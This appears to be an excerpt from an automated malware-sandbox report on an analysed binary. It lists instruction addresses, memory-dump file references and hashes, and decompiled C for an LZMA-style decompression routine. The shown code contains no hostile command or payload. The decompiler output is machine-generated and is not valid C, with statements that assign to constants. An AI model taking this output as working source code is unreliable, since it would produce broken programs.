                                                                                                                          0x004063bd
                                                                                                                          0x00406a02
                                                                                                                          0x00000000
                                                                                                                          0x00406a02
                                                                                                                          0x004063c3
                                                                                                                          0x004063c6
                                                                                                                          0x004063c9
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x004063d7
                                                                                                                          0x004063da
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406544
                                                                                                                          0x00406544
                                                                                                                          0x00406548
                                                                                                                          0x00406a0e
                                                                                                                          0x00000000
                                                                                                                          0x00406a0e
                                                                                                                          0x0040654e
                                                                                                                          0x00406551
                                                                                                                          0x00406554
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655c
                                                                                                                          0x0040655f
                                                                                                                          0x00406562
                                                                                                                          0x00406565
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656c
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406571
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657d
                                                                                                                          0x0040657f
                                                                                                                          0x0040657f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406582
                                                                                                                          0x00406582
                                                                                                                          0x00000000
                                                                                                                          0x00406582
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00406a5a
                                                                                                                          0x00406a60
                                                                                                                          0x00406a62
                                                                                                                          0x00406a69
                                                                                                                          0x00406a6b
                                                                                                                          0x00406a72
                                                                                                                          0x00406a76
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00406a6f
                                                                                                                          0x00406a6f
                                                                                                                          0x00000000
                                                                                                                          0x00406a6f
                                                                                                                          0x004068bc
                                                                                                                          0x00406942
                                                                                                                          0x00406948
                                                                                                                          0x0040694b
                                                                                                                          0x0040694e
                                                                                                                          0x00406951
                                                                                                                          0x00406954
                                                                                                                          0x00406957
                                                                                                                          0x0040695a
                                                                                                                          0x0040695d
                                                                                                                          0x00406963
                                                                                                                          0x0040697c
                                                                                                                          0x0040697f
                                                                                                                          0x00406982
                                                                                                                          0x00406985
                                                                                                                          0x00406989
                                                                                                                          0x0040698b
                                                                                                                          0x0040698c
                                                                                                                          0x0040698f
                                                                                                                          0x00406965
                                                                                                                          0x00406965
                                                                                                                          0x0040696d
                                                                                                                          0x00406972
                                                                                                                          0x00406974
                                                                                                                          0x00406977
                                                                                                                          0x00406977
                                                                                                                          0x00406999
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00406999
                                                                                                                          0x00000000
                                                                                                                          0x0040680e

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                                                                          • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                                                                                          • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                                                                          • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
